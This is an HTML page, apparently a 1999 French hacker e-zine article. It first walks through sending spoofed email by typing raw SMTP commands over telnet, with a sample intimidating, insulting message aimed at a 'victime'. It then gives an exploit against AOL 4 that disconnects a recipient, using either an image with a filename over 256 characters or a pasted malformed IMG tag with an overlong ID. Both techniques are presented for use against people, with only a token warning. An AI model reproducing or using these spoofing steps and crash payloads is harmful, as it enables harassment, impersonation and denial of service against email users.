<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>

<HEAD>
	<META HTTP-EQUIV="Content-Type" CONTENT="text/html;CHARSET=iso-8859-1">
	<META NAME="GENERATOR" Content="Visual Page 1.1 for Windows">
	<TITLE>Mail anonyme </TITLE>
</HEAD>

<BODY TEXT="#FFFFFF" BGCOLOR="#000000">

<P ALIGN="CENTER"><FONT FACE="Brush Script MT"><big><big><big><big>Mail anonyme !</big></big></big></big></FONT></P>
<P ALIGN="CENTER"><FONT FACE="Brush Script MT"><big><big><big><big>&nbsp;</big></big></big></big></FONT></P>
<P><big><big><big><FONT FACE="Brush Script MT">Bon pour ce nouveau num&eacute;ro de Snapscan, j'ai tr&egrave;s
peu de temps pour pondre un article ! Alors je vais vous expliquer comment on fabrique un mail anonyme. Il n'y
a rien de compliqu&eacute;, c'est vraiment tout con. Donc parfait pour les newbies. Allez, j'arr&ecirc;te le baratin,
c'est parti !!</FONT></big></big></big></P>
<P><big><big><big><FONT FACE="Brush Script MT">&nbsp;</FONT></big></big></big></P>
<P><FONT FACE="Times New Roman"><big>Tout ce que vous avez &agrave; taper appara&icirc;tra en rouge.</big></FONT></P>
<P><FONT FACE="Times New Roman"><big>&nbsp;</big></FONT></P>
<P><FONT FACE="Times New Roman"><big>La toute premi&egrave;re chose a faire, c'est de se connecter en Telnet :</big></FONT></P>

<P><FONT COLOR="#FF0000" FACE="Times New Roman"><big>Telnet serveur 25</big></FONT></P>

<P><FONT FACE="Times New Roman"><big>A partir de la il faut choisir un serveur de mail. La vous prenez celui que
vous voulez. Par exemple, voici la pr&eacute;sentation typique d'un serveur :</big></FONT></P>

<P><FONT FACE="Times New Roman"><big>220 mail.serveur.fr</big></FONT></P>

<P><FONT FACE="Times New Roman"><big>ESMTP Serveur des agriculteurs de Loz&egrave;re; Sun, 18 jun 1999 17:30:51
+0100 (CET)</big></FONT></P>

<P><FONT FACE="Times New Roman"><big>Il faut indentifier maintenant votre machine :</big></FONT></P>

<P><FONT COLOR="#FF0000" FACE="Times New Roman"><big>helo newbie.com</big></FONT></P>

<P><FONT FACE="Times New Roman"><big>Puis commencer &agrave; pr&eacute;parer l'envoi :</big></FONT></P>

<P><FONT COLOR="#FF0000" FACE="Times New Roman"><big>mail from : bouseux@newbye.com</big></FONT>      <FONT COLOR="#0066FF">(NDV:
ne mettez pas d'espaces entre from et les deux points et entre les deux points et bouseux)</FONT></P>

<P><FONT COLOR="#FF0000" FACE="Times New Roman"><big>rcpt to : victime@lamer.com</big></FONT>               <FONT
COLOR="#0066FF">(NDV: meme remarque ici)</FONT></P>

<P><FONT COLOR="#FF0000" FACE="Times New Roman"><big>data</big></FONT></P>

<P><FONT FACE="Times New Roman"><big>A ce niveau l&agrave;, le serveur attends plus que le message :</big></FONT></P>

<P><FONT COLOR="#FF0000" FACE="Times New Roman"><big>Date : Sun, 17 Jun 1999 17:32:52 +0100</big></FONT></P>

<P><FONT COLOR="#FF0000" FACE="Times New Roman"><big>Subject : Un pti mail pour te foutre les jetons ! = )</big></FONT></P>

<P><FONT COLOR="#FF0000" FACE="Times New Roman"><big>To : Gros lamer &lt;victime@lamer.com&gt;</big></FONT></P>

<P><FONT COLOR="#FF0000" FACE="Times New Roman"><big>From : Bouseux &lt;bouseux@newbie.com&gt;</big></FONT></P>

<P><FONT COLOR="#FF0000" FACE="Times New Roman"><big>Cc : Mon pote momo &lt;momo@newbie.com&gt;</big></FONT></P>
<P><FONT COLOR="#FF0000" FACE="Times New Roman"><big>&nbsp;</big></FONT></P>
<P><FONT COLOR="#FF0000" FACE="Times New Roman"><big>Salut Gros lamer !</big></FONT></P>
<P><FONT COLOR="#FF0000" FACE="Times New Roman"><big>Je t'envois ce pti mail parce que j'avais que ca a foutre
! bien le bonjour a ta grosse !</big></FONT></P>
<P><FONT COLOR="#FF0000" FACE="Times New Roman"><big>Bye</big></FONT></P>
<P><FONT COLOR="#FF0000" FACE="Times New Roman"><big>.</big></FONT></P>
<P><FONT FACE="Times New Roman"><big>Surtout ne pas oublier le point &agrave; la fin du message sur un d&eacute;but
du message ! Il indique au serveur la fin du message.</big></FONT></P>
<P><FONT FACE="Times New Roman"><big>Regardons maintenant ce que la victime va recevoir !</big></FONT></P>
<P><FONT FACE="Times New Roman"><big>&nbsp;</big></FONT></P>
<P><FONT FACE="Times New Roman"><big>Received : from mail.provider.fr</big></FONT></P>
<P><FONT FACE="Times New Roman"><big>[194.151.223.25] by trouduc.provider.fr with pop3 ...</big></FONT></P>
<P><FONT FACE="Times New Roman"><big>....</big></FONT></P>
<P><FONT FACE="Times New Roman"><big>Delivered-to : victime@lamer.com</big></FONT></P>
<P><FONT FACE="Times New Roman"><big>...</big></FONT></P>
<P><FONT FACE="Times New Roman"><big></FONT><FONT COLOR="#FF0000" FACE="Times New Roman">Received : from newbie.com
(ppp112.provider.fr [152.146.85.42])</FONT><FONT FACE="Times New Roman"> by mail.maileur.fr (8.8.8/8.8.8) with
SMTP id EAA24557 .....</big></FONT></P>
<P><FONT FACE="Times New Roman"><big>....</big></FONT></P>
<P><FONT FACE="Times New Roman"><big>....</big></FONT></P>
<P><FONT FACE="Times New Roman"><big>Le reste on s'en fout ! Regardez la ligne en rouge, elle correspond &agrave;
l'adresse donn&eacute;e mais elle contient &eacute;galement votre IP. Donc si la victime se met &agrave; chercher
votre domaine (nslookup, traceroute), ben vous l'avez dans l'os. Bon, on peut tr&egrave;s bien le baiser en passant
par un proxy mais c'est une autre histoire tout &ccedil;a ( peut &ecirc;tre dans un prochain num&eacute;ro, qui
sait ! ) !</big></FONT></P>
<P><FONT FACE="Times New Roman"><big>&nbsp;</big></FONT></P>
<P><FONT FACE="Times New Roman"><big>&nbsp;</big></FONT></P>
<P><FONT FACE="Times New Roman"><big>&nbsp;</big></FONT></P>
<P ALIGN="CENTER"><FONT FACE="Brush Script MT"><STRONG><U><big><big><big><big>Exploiter un bug d'AOL !</big></big></big></big></U></STRONG></FONT></P>
<P ALIGN="CENTER"><FONT FACE="Brush Script MT"><big><big><big><big>&nbsp;</big></big></big></big></FONT></P>
<P><big><big><big><FONT FACE="Brush Script MT">Je vais maintenant parler d'un petit bug d'AOL qui est exploitable
pour d&eacute;connecter une personne sans se prendre la t&ecirc;te. Bon, je mets un b&eacute;mol tout de m&ecirc;me
! Ne vous amusez pas &agrave; effectuer cela par plaisir, &ccedil;a casse les couilles de se retrouver d&eacute;co
tout &ccedil;a parce qu'un pti con se sera amus&eacute; toute la soir&eacute;e avec ce truc ! Alors, utilisez le
&agrave; bon escient !</FONT></big></big></big></P>

<P><big><big><big><FONT FACE="Brush Script MT">&nbsp;</FONT></big></big></big></P>

<P><FONT FACE="Times New Roman"><big>En fait, ce petit truc exploite un bug dans l'envoi et la r&eacute;ception
de mails. Il y a deux fa&ccedil;on de l'exploiter, avec ou sans image. Remarque : cela ne marche que pour aol 4
!</big></FONT> <FONT COLOR="#0066FF">(ndV: il me semble quand meme qu'il est possible de d&eacute;co un mec qui
a la version 3, &agrave; v&eacute;rifier)</FONT></P>

<P><FONT FACE="Times New Roman"><big>&nbsp;</big></FONT></P>

<P><FONT FACE="Times New Roman"><big>1) <U>Avec une image :</U></big></FONT></P>

<P><FONT FACE="Times New Roman"><big>Choisir sur son disque dur une image. La renommer de fa&ccedil;on &agrave;
ce que son nom fasse plus de 256 caract&egrave;res. Exemple :</big></FONT></P>

<P><FONT FACE="Times New Roman"><big>image.jpg&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; devient :&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
aaaaaaaaaaaaa...aaaaa.jpg</big></FONT></P>

<P><FONT FACE="Times New Roman"><big>Ensuite, sous aol, vous r&eacute;digez un mail vers la victime. vous remplissez
les champs de l'ent&ecirc;te, surtout le sujet qui va donner envie &agrave; la victime d'ouvrir le mail. Dans la
fen&ecirc;tre o&ugrave; vous tapez le message d'habitude, vous ins&eacute;rez l'image ! J'ai dit ins&eacute;rer
et pas attacher ! Faites bien la diff&eacute;rence ! Maintenant envoyez, lorsque la victime l'ouvrira, elle sera
d&eacute;connect&eacute;e !</big></FONT></P>

<P><FONT FACE="Times New Roman"><big>&nbsp;</big></FONT></P>

<P><FONT FACE="Times New Roman"><big>2) <U>Sans image :</U></big></FONT></P>

<P><FONT FACE="Times New Roman"><big>Plus simple et plus rapide !</big></FONT></P>

<P><FONT FACE="Times New Roman"><big>R&eacute;digez un mail pour la victime (ent&ecirc;te) et dans la fen&ecirc;tre
du message vous tapez ceci :</big></FONT></P>

<P>&lt;IMG SRC=&quot;Krypto.exe&quot; <BR>
ID=999999999999999999999<BR>
999999999999999999999999<BR>
999999999999999999999999<BR>
999999999999999999&quot; <BR>
WIDTH=&quot;1&quot; HEIGHT=&quot;1&quot; <BR>
BORDER=&quot;0&quot; <BR>
DATASIZE=&quot;1000&quot;&gt;</P>
<P>&nbsp;</P>
<P><FONT FACE="Times New Roman"><big>Faites un copier coller ce sera plus rapide encore ! Ce syst&egrave;me &agrave;
le m&ecirc;me effet que l'image, ms vous avez pas &agrave; vous faire chier &agrave; coller une image.</big></FONT></P>
<P><FONT FACE="Times New Roman"><big>Voila, c'est tout pour ce bug, alors ne vous amusez pas trop quand m&ecirc;me
!</big></FONT></P>
<P><FONT FACE="Times New Roman"><big>&nbsp;</big></FONT></P>
<P><big><big><big><FONT FACE="Brush Script MT">Voila mon pti Veins, tu l'as eu mon article, et &agrave; temps en
plus ! Maintenant, je passe le bonjour &agrave; tout mes potes Rhyl, Veins, Gazzz, Baal, Asmo, Cuti et bien sur
Bloodwaves, mais aussi &agrave; tous ceux qui me connaissent. Sur ce, je vous laisse tranquille, et &agrave; la
prochaine fois ! Tchusssss !!!!!</FONT></big></big></big></P>
<P><big><big><big><FONT FACE="Brush Script MT">&nbsp;</FONT></big></big></big></P>
<P ALIGN="RIGHT"><big><big><big><FONT FACE="Brush Script MT"><U>The Boss</U>&nbsp;&nbsp; </FONT></big></big></big>

</BODY>

</HTML>